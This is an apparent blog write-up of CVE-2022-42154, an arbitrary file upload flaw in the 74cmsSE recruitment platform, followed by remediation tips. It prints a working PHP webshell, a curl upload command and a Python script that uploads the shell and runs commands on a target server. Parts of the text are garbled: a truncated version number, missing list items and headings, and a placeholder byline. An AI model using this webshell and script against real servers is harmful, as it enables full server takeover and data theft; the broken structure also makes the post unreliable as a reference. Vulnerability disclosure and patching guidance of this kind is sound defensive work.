Security vulnerabilities in web applications are a constant threat. One particularly dangerous bug is an arbitrary file upload vulnerability, which often leads to Remote Code Execution (RCE). In this post, we dive deep into CVE-2022-42154, found in the 74cmsSE v3.13. platform—a popular open-source recruitment system widely used in China and beyond. This vulnerability lets attackers upload malicious PHP files through the /apiadmin/upload/attach endpoint, giving them full control over the server.

Let's understand how this flaw works, see examples of how attackers exploit it, and learn how to protect affected systems.

What is 74cmsSE?

74cmsSE is a recruitment management platform built on PHP. Like many web-based systems, it allows users and admins to upload files—such as résumés, company logos, and more.

Endpoint in Focus

The vulnerable endpoint is:  

/apiadmin/upload/attach

This API is supposed to handle file uploads. However, in v3.13., it fails to restrict file types, contents, or extensions adequately. As a result, attackers can upload PHP files that the webserver will later execute.

What Does Arbitrary File Upload Mean?

Arbitrary file upload means that an attacker can upload any file type they want. Critical issues arise if an attacker can upload PHP (or another server-executable script) file and then access it via the server’s public URL.

Exploit Walkthrough

Here is a step-by-step explanation of how someone could exploit this vulnerability.

First, the attacker creates a simple PHP webshell. For example, contents of cmd.php

<?php
if(isset($_REQUEST['cmd'])){
    system($_REQUEST['cmd']);
}
?>


This little script lets the attacker run any command on the server, just by visiting the script and appending ?cmd=ls or ?cmd=id to the URL.

The attacker uses a tool like curl or Burp Suite to upload the file. Example using curl

curl -F "file=@cmd.php" http://target.com/apiadmin/upload/attach

Note: The actual parameter name might be different in practice (file, upload, or similar). The endpoint fails to check the extension or MIME type, so the upload goes through.

3. Locate the File Path

The server usually returns the upload path or filename in the response. If not, attackers can guess common upload directories—like /uploads/, /public/uploads/, or similar.

The attacker then accesses the uploaded PHP file via the web browser

http://target.com/uploads/cmd.php?cmd=whoami

Now, the server executes any command passed as the cmd parameter, such as listing files, reading sensitive files, or adding a new admin user.

Below is a simple Python script to automate the attack

import requests

url = 'http://target.com/apiadmin/upload/attach'
files = {'file': ('cmd.php', '<?php if(isset($_REQUEST["cmd"])) { system($_REQUEST["cmd"]); } ?>')}
resp = requests.post(url, files=files)
print('Upload response:', resp.text)

# Suppose the upload path is in the response or is known
shell_url = 'http://target.com/uploads/cmd.php';
cmd = {'cmd': 'whoami'}
shell_resp = requests.get(shell_url, params=cmd)
print('Command output:', shell_resp.text)


*Replace target.com and the upload path as needed.*

Original References

- CVE Details for CVE-2022-42154
- Exploit Database Entry
- Github Advisory for 74cmsSE

Complete Site Takeover: They could deface, data mine, or destroy all your content.

3. Lateral Movement: Gaining a foothold might allow attackers to compromise other systems on the same network.

Remediation

If you manage a 74cmsSE v3.13. system, you must upgrade to the latest version immediately. If an update is not available, apply these temporary fixes:

- Restrict uploaded file types: Only allow image or document extensions (e.g., .jpg, .png, .pdf).

Store uploads outside web root: Prevent direct web access to uploaded files.

- Apply webserver rules: Block execution of PHP files in upload directories, e.g., using .htaccess:

deny from all

Final Thoughts

CVE-2022-42154 highlights the risks of insecure file upload functionalities. Even well-meaning features can be doors for attackers. Always validate and sanitize any user-supplied input, especially uploaded files. For 74cmsSE v3.13. users, patch now or risk a total compromise.

Stay secure and keep your systems patched!

*Original research and exclusive content by [YourName]. If you found this useful, share it with your team and community.*

Timeline

Published on: 10/17/2022 14:15:00 UTC
Last modified on: 10/19/2022 15:12:00 UTC